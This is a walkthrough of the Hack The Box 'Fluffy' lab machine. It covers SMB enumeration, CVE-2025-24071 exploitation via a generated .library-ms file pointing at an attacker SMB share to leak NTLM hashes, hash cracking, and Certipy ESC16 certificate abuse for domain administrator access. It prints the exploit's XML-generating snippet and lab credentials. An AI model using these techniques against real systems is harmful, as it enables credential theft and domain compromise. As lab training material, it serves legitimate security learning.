LoginHack The Box: Fluffy Machine Walkthrough β Easy Difficulity
Introduction to Fluffy:
In this write-up, we will explore the βFluffyβ machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Machine Information
In this scenario, similar to real-world Windows penetration tests, you begin the Fluffy machine with the following credentials: j.fleischman / J0elTHEM4n1990!.
Objective:
The goal of this walkthrough is to complete the βFluffyβ machine from Hack The Box by achieving the following objectives:
User Flag:
Initial access was gained by exploiting CVE-2025-24071 with a malicious .library-ms file delivered via SMB. The victimβs NTLMv2-SSP hash was captured with Responder and cracked using Hashcat (mode 5600), revealing prometheusx-303. Domain enumeration with BloodHound showed p.agila@fluffy.htb had GenericAll rights over Service Accounts, enabling control of winrm_svc.
Root Flag:
We escalated privileges by abusing the ca_svc account, which is a member of Service Accounts and Cert Publishers, granting it AD CS access. Using Certipy, we identified an ESC16 vulnerability, updated ca_svcβs userPrincipalName to impersonate the administrator, generated a certificate, and obtained both a TGT and the NT hash.
Enumerating the Fluffy Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sV -sC -oA initial -Pn 10.10.11.69Nmap Output:
ββ[dark@parrot]β[~/Documents/htb/fluffy]
ββββΌ $nmap -sV -sC -oA initial -Pn 10.10.11.69
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-18 02:49:59Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
445/tcp open microsoft-ds?464/tcp open kpasswd5?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-18T02:51:30+00:00; +4h17m24s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-18T02:51:30+00:00; +4h17m24s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17Analysis:
- 53/tcp (DNS): Handles domain name resolution; check for zone transfer misconfigurations.
- 88/tcp (Kerberos): Confirms Active Directory; use for Kerberos user enumeration or ticket attacks.
- 139/tcp (NetBIOS-SSN): Legacy Windows file/printer sharing; enumerate shares and sessions.
- 389/tcp (LDAP): Queryable directory service; useful for enumerating AD users, groups, and policies.
- 445/tcp (SMB): Provides file sharing and remote management; test for SMB enumeration and null sessions.
- 464/tcp (kpasswd5): Kerberos password change service; abuseable in AS-REP roasting or password reset attacks.
- 636/tcp (LDAPS): Encrypted LDAP; secure channel for directory queries, still useful for enumeration if authenticated.
- 3269/tcp (GC over SSL): Global Catalog LDAP over SSL; enables cross-domain AD enumeration.
Samba Enumeration
We discovered the Samba share as shown above.
By using impacket-smbclient with the provided credentials, we were able to gain access as shown above.
There are several files saved inside the directory, but one file in particular caught my attention β Upgrade_Notice.pdf.
We proceeded to download the PDF to our local machine.
Exploitability Research
The PDF outlines the upgrade process and highlights several key vulnerabilities:
- CVE-2025-24996 (Critical): External control of file names/paths in Windows NTLM, enabling network spoofing and possible unauthorized access.
- CVE-2025-24071 (Critical): Windows File Explorer spoofing vulnerability where crafted
.library-msfiles in archives trigger SMB connections, leaking NTLM hashes without user action. - CVE-2025-46785 (High): Buffer over-read in Zoom Workplace Apps for Windows that allows an authenticated user to trigger network-based denial of service.
- CVE-2025-29968 (High): Improper input validation in Microsoft AD CS leading to denial of service and potential system disruption.
- CVE-2025-21193 (Medium): CSRF-based spoofing in Active Directory Federation Services, primarily impacting confidentiality.
- CVE-2025-3445 (Low): Path traversal in Go library
mholt/archiver, allowing crafted ZIPs to write files outside intended directories, risking data overwrite or misuse.
No other significant information appeared that we could leverage in this context.
CVE-2025-24071: Windows File Explorer SMB NTLM Disclosure
Vulnerable Code Analysis (CVE-2025-24071)
Malicious File Generation
The exploit dynamically creates an XML file with a hardcoded SMB path (\\attacker_ip\shared), which Windows automatically processes:
library_content = f"""
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\\\{ip_address}\\shared</url> <!-- Vulnerable: Triggers SMB -->
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>"""Manual Exploitation Process
Therefore, we proceeded to exploit it using the manual method, starting with the creation of a malicious .library-ms file.
Once the malicious .library-ms file is successfully created, it needs to be compressed into a ZIP archive.
Initiate the Responder and monitor the incoming network packets for analysis.
As a result, we transferred the malicious.zip to the victimβs machine using smbclient.
We captured the NTLMv2-SSP hash and can now attempt to crack it.
Credential Recovery via Hash Cracking
The hash was successfully cracked within one minute, revealing the password: prometheusx-303.
BloodHound Active Directory Enumeration
We proceeded to enumerate the environment using BloodHound.
Analyzing BloodHound Enumeration Data
The account p.agila@fluffy.htb is a member of the Service Account Managers@fluffy.htb group, which has GenericAll permissions over the Service Accounts@fluffy.htb group. This means p.agila can fully manage members of the Service Accounts group, including adding, removing, or modifying accounts β a powerful privilege that can be leveraged for privilege escalation.
The accounts ldap_svc@fluffy.htb, ca_svc@fluffy.htb, and winrm_svc@fluffy.htb all belong to the service accounts@fluffy.htb group. They share similar privilege levels and likely support service-related operations, creating a common attack surface if an attacker compromises any one of them.
The domain hierarchy shows that authenticated users@fluffy.htb are members of everyone@fluffy.htb, with domain users inheriting from both authenticated users and users. Authenticated users also have pre-Windows 2000 and Certificate Service DCOM access. The ca_svc account belongs to domain users, service accounts, and cert publishers. While cert publishers is part of the Denied RODC Password Replication Group (blocking password replication to RODCs), it retains certificate publishing rights.
Performing a Certipy Shadow Attack on Fluffy Machine
It is also possible to add the user p.agila to the SERVICE ACCOUNTS group.
This process retrieves the NT hash, and you can repeat it for the other two users. The name winrm_svc indicates that you can access it directly through WinRM and authenticate using the hash.
The command uses Certipy to authenticate as the user winrm_svc with a captured NT hash against the domain controller DC01.fluffy.htb. By specifying both the domain controller IP and the target IP, it attempts to perform a pass-the-hash attack, enabling access without needing the plaintext password.
This data contains a substantial amount of information that requires careful analysis and processing.
I noticed the presence of the Cert Publishers group.
Retrieving the User Flag on Fluffy Machine
We can access the machine using the winrm_svc account by leveraging its NT hash.
We can read the user flag by executing the command type user.txt.
Escalate to Root Privileges Access on Fluffy Machine
Privilege Escalation:
This command leverages Certipy in combination with ntpdate to adjust the system time, targeting the user ca_svc with the specified NT hash against the domain fluffy.htb. The -stdout option directs the output to the console, and the -vulnerable flag identifies potentially exploitable accounts or services. This method facilitates pass-the-hash or Kerberos-related enumeration while accounting for time-based restrictions in the environment.
Privilege Escalation via ESC16 Misconfiguration
The Certificate Authority (CA) DC01.fluffy.htb is vulnerable to ESC16, a misconfiguration that allows abusing certificate templates for privilege escalation. While the WINRM_SVC account lacks elevated privileges, its CA access provides a path to target higher-privileged accounts, such as the administrator.
Vulnerabilities
ESC16: The disabled Security Extension leaves the system susceptible to abuse.
Remarks
ESC16 may require additional prerequisites. Refer to the official wiki for guidance.
We executed the Certipy account command to update the ca_svc account on the fluffy.htb domain. Using the credentials of p.agila@fluffy.htb (prometheusx-303) and targeting the domain controller at 10.10.11.69, we modified the accountβs userPrincipalName to administrator. This modification allows the account to perform actions with elevated privileges, enabling further privilege escalation within the environment.
Using Certipyβs shadow command, we performed automated Kerberos-based credential extraction for the ca_svc account on fluffy.htb. Authenticated as p.agila@fluffy.htb (prometheusx-303) and targeting 10.10.11.69, Certipy generated a certificate and key credential, temporarily added it to ca_svcβs Key Credentials, and authenticated as ca_svc. It obtained a TGT, saved the cache to ca_svc.ccache, and retrieved the NT hash (ca0f4f9e9eb8a092addf53bb03fc98c8). Certipy then restored ca_svcβs original Key Credentials. Finally, we set KRB5CCNAME=ca_svc.ccache to enable subsequent Kerberos operations with the extracted credentials.
Using Certipy, we issued a certificate request with the req command, targeting the domain controller DC01.FLUFFY.HTB and the Certificate Authority fluffy-DC01-CA, while specifying the User template. Although we did not explicitly provide the DC host, Kerberos authentication handled the request over RPC. The Certificate Authority successfully processed the request (Request ID 15) and issued a certificate for the administrator user principal. The certificate did not include an object SID, with a note suggesting the -sid option if needed. We saved the certificate and its private key to administrator.pfx, completing the process.
The command uses Certipy to update the ca_svc account on the domain fluffy.htb. Authenticated as p.agila@fluffy.htb with the password prometheusx-303 and targeting the domain controller at 10.10.11.69, the accountβs userPrincipalName is set to ca_svc@fluffy.htb. Certipy confirms that the update was successful, ensuring the ca_svc account reflects the correct user principal name for subsequent operations.
Administrator Authentication Using Certipy
Using Certipy, the auth command was executed to authenticate as the administrator user on the domain fluffy.htb using the certificate stored in administrator.pfx. The tool identified the certificateβs SAN UPN as administrator and used it to request a Ticket Granting Ticket (TGT) from the domain controller at 10.10.11.69. The TGT was successfully obtained and saved to the credential cache file administrator.ccache. Certipy then retrieved the NT hash for administrator@fluffy.htb, which can be used for subsequent authentication or privilege escalation activities.
Remote Execution & Root Flag Retrieval
We accessed the target machine via WinRM using either the authenticated credentials or the extracted NT hash, which enabled remote command execution on the system.
We can read the root flag by executing the command type root.txt.
The post Hack The Box: Fluffy Machine Walkthrough β Easy Difficulity appeared first on Threatninja.net.
